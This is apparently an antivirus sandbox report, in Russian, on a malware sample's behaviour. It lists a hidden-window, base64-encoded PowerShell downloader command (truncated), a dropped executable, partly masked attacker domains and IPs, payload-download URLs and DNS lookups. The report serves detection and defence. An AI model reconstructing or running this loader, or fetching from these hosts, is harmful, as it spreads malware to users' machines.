Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAF8AXwBfADQANQA9ACgAJwByADUAOQA0ACcAKwAnADIAXwAnACkAOwAkAEYAOAAxADIAXwAwADcAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQASQBfAF8ANwBfADMANgA9ACgAJwBoAHQAdABwAD...
- %HOMEPATH%\719.exe
- %HOMEPATH%\719.exe
- '35.#34.5.71':80
- 'co##ndo.vn':80
- 'co##ndo.vn':443
- 'ed##nta.com':80
- 'ed##nta.com':443
- 'pi##uji.com':80
- http://co##ndo.vn/9PceFpg6P
- http://www.ed##nta.com/wp-content/rVUyl6cvjXvhj
- http://www.pi##uji.com/X8zw7c0hMYN7v3DD_L
- 'co##ndo.vn':443
- 'ed##nta.com':443
- DNS ASK co##ndo.vn
- DNS ASK ed##nta.com
- DNS ASK pi##uji.com
- DNS ASK be######althcareclub.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAF8AXwBfADQANQA9ACgAJwByADUAOQA0ACcAKwAnADIAXwAnACkAOwAkAEYAOAAxADIAXwAwADcAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQASQBfAF8ANwBfADMANgA9ACgAJwBoAHQAdABwAD...' (со скрытым окном)